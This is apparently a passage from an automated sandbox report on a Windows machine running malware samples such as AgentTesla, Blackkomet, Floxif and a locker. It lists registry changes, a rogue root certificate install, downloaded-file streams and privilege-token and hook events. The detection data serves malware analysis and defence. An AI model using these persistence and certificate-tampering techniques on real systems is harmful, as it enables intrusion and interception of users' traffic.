Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	winupdate.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Blackkomet.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	winupdate.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Applications\msedge.exe\shell\open	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\apk_auto_file	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Applications	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Applications\msedge.exe	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\apk_auto_file\shell\open\command	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\apk_auto_file\shell\open\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" \"%1\""	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	winupdate.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Applications\msedge.exe\shell	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Applications\msedge.exe\shell\open\command	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\R쀀\ = "apk_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\apk_auto_file\shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\.apk	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	OpenWith.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	Furk Ultra.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Furk Ultra.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Furk Ultra.exe

NTFS ADS 20 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 38340.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Floxif.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Xeno-v1.1.0-x64.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Xeno-v1.1.0-x64 (1).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WinNuke.98.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\$uckyLocker.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 976554.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\libcrypto-3-x64.dll:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 854824.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Roblox.Arceus.X.Admin.1.0.9.apk:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ArcticBomb.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 261650.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 769575.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 28025.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 219456.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 218570.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Blackkomet.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Furk.Ultra.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3836	msedge.exe
3836	msedge.exe
4512	msedge.exe
4512	msedge.exe
3300	identity_helper.exe
3300	identity_helper.exe
1540	msedge.exe
1540	msedge.exe
1664	msedge.exe
1664	msedge.exe
4792	msedge.exe
4792	msedge.exe
4972	msedge.exe
4972	msedge.exe
4972	msedge.exe
4972	msedge.exe
5996	msedge.exe
5996	msedge.exe
4896	msedge.exe
4896	msedge.exe
5744	msedge.exe
5744	msedge.exe
3096	msedge.exe
3096	msedge.exe
5740	msedge.exe
5740	msedge.exe
4108	XenoUI.exe
4108	XenoUI.exe
4108	XenoUI.exe
4108	XenoUI.exe
4108	XenoUI.exe
4108	XenoUI.exe
1928	powershell.exe
1928	powershell.exe
1928	powershell.exe
3552	XenoUI.exe
3552	XenoUI.exe
3552	XenoUI.exe
3552	XenoUI.exe
3552	XenoUI.exe
3552	XenoUI.exe
3680	XenoUI.exe
3680	XenoUI.exe
3680	XenoUI.exe
3680	XenoUI.exe
3680	XenoUI.exe
3680	XenoUI.exe
1900	XenoUI.exe
1900	XenoUI.exe
1900	XenoUI.exe
1900	XenoUI.exe
1900	XenoUI.exe
1900	XenoUI.exe
2352	XenoUI.exe
2352	XenoUI.exe
2352	XenoUI.exe
2352	XenoUI.exe
2352	XenoUI.exe
2352	XenoUI.exe
5608	msedge.exe
5608	msedge.exe
6216	msedge.exe
6216	msedge.exe
6516	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 6 IoCs

pid	Process
2488	OpenWith.exe
3808	OpenWith.exe
968	OpenWith.exe
1616	OpenWith.exe
4512	msedge.exe
8056	AgentTesla.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3128	firefox.exe
Token: SeDebugPrivilege	3128	firefox.exe
Token: SeDebugPrivilege	5632	firefox.exe
Token: SeDebugPrivilege	5632	firefox.exe
Token: SeDebugPrivilege	4276	Floxif.exe
Token: SeDebugPrivilege	3348	Floxif.exe
Token: SeDebugPrivilege	5632	firefox.exe
Token: SeDebugPrivilege	5632	firefox.exe
Token: SeDebugPrivilege	5632	firefox.exe
Token: SeIncreaseQuotaPrivilege	704	Blackkomet.exe
Token: SeSecurityPrivilege	704	Blackkomet.exe
Token: SeTakeOwnershipPrivilege	704	Blackkomet.exe
Token: SeLoadDriverPrivilege	704	Blackkomet.exe
Token: SeSystemProfilePrivilege	704	Blackkomet.exe
Token: SeSystemtimePrivilege	704	Blackkomet.exe
Token: SeProfSingleProcessPrivilege	704	Blackkomet.exe
Token: SeIncBasePriorityPrivilege	704	Blackkomet.exe
Token: SeCreatePagefilePrivilege	704	Blackkomet.exe
Token: SeBackupPrivilege	704	Blackkomet.exe
Token: SeRestorePrivilege	704	Blackkomet.exe
Token: SeShutdownPrivilege	704	Blackkomet.exe
Token: SeDebugPrivilege	704	Blackkomet.exe
Token: SeSystemEnvironmentPrivilege	704	Blackkomet.exe
Token: SeChangeNotifyPrivilege	704	Blackkomet.exe
Token: SeRemoteShutdownPrivilege	704	Blackkomet.exe
Token: SeUndockPrivilege	704	Blackkomet.exe
Token: SeManageVolumePrivilege	704	Blackkomet.exe
Token: SeImpersonatePrivilege	704	Blackkomet.exe
Token: SeCreateGlobalPrivilege	704	Blackkomet.exe
Token: 33	704	Blackkomet.exe
Token: 34	704	Blackkomet.exe
Token: 35	704	Blackkomet.exe
Token: 36	704	Blackkomet.exe
Token: SeIncreaseQuotaPrivilege	4536	winupdate.exe
Token: SeSecurityPrivilege	4536	winupdate.exe
Token: SeTakeOwnershipPrivilege	4536	winupdate.exe
Token: SeLoadDriverPrivilege	4536	winupdate.exe
Token: SeSystemProfilePrivilege	4536	winupdate.exe
Token: SeSystemtimePrivilege	4536	winupdate.exe
Token: SeProfSingleProcessPrivilege	4536	winupdate.exe
Token: SeIncBasePriorityPrivilege	4536	winupdate.exe
Token: SeCreatePagefilePrivilege	4536	winupdate.exe
Token: SeBackupPrivilege	4536	winupdate.exe
Token: SeRestorePrivilege	4536	winupdate.exe
Token: SeShutdownPrivilege	4536	winupdate.exe
Token: SeDebugPrivilege	4536	winupdate.exe
Token: SeSystemEnvironmentPrivilege	4536	winupdate.exe
Token: SeChangeNotifyPrivilege	4536	winupdate.exe
Token: SeRemoteShutdownPrivilege	4536	winupdate.exe
Token: SeUndockPrivilege	4536	winupdate.exe
Token: SeManageVolumePrivilege	4536	winupdate.exe
Token: SeImpersonatePrivilege	4536	winupdate.exe
Token: SeCreateGlobalPrivilege	4536	winupdate.exe
Token: 33	4536	winupdate.exe
Token: 34	4536	winupdate.exe
Token: 35	4536	winupdate.exe
Token: 36	4536	winupdate.exe
Token: SeIncreaseQuotaPrivilege	4636	winupdate.exe
Token: SeSecurityPrivilege	4636	winupdate.exe
Token: SeTakeOwnershipPrivilege	4636	winupdate.exe
Token: SeLoadDriverPrivilege	4636	winupdate.exe
Token: SeSystemProfilePrivilege	4636	winupdate.exe
Token: SeSystemtimePrivilege	4636	winupdate.exe
Token: SeProfSingleProcessPrivilege	4636	winupdate.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe
5632	firefox.exe
5632	firefox.exe

Suspicious use of SendNotifyMessage 44 IoCs

pid	Process
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
4512	msedge.exe
6544	Furk Ultra.exe
6544	Furk Ultra.exe
4512	msedge.exe
4512	msedge.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
7684	chrome.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
2488	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
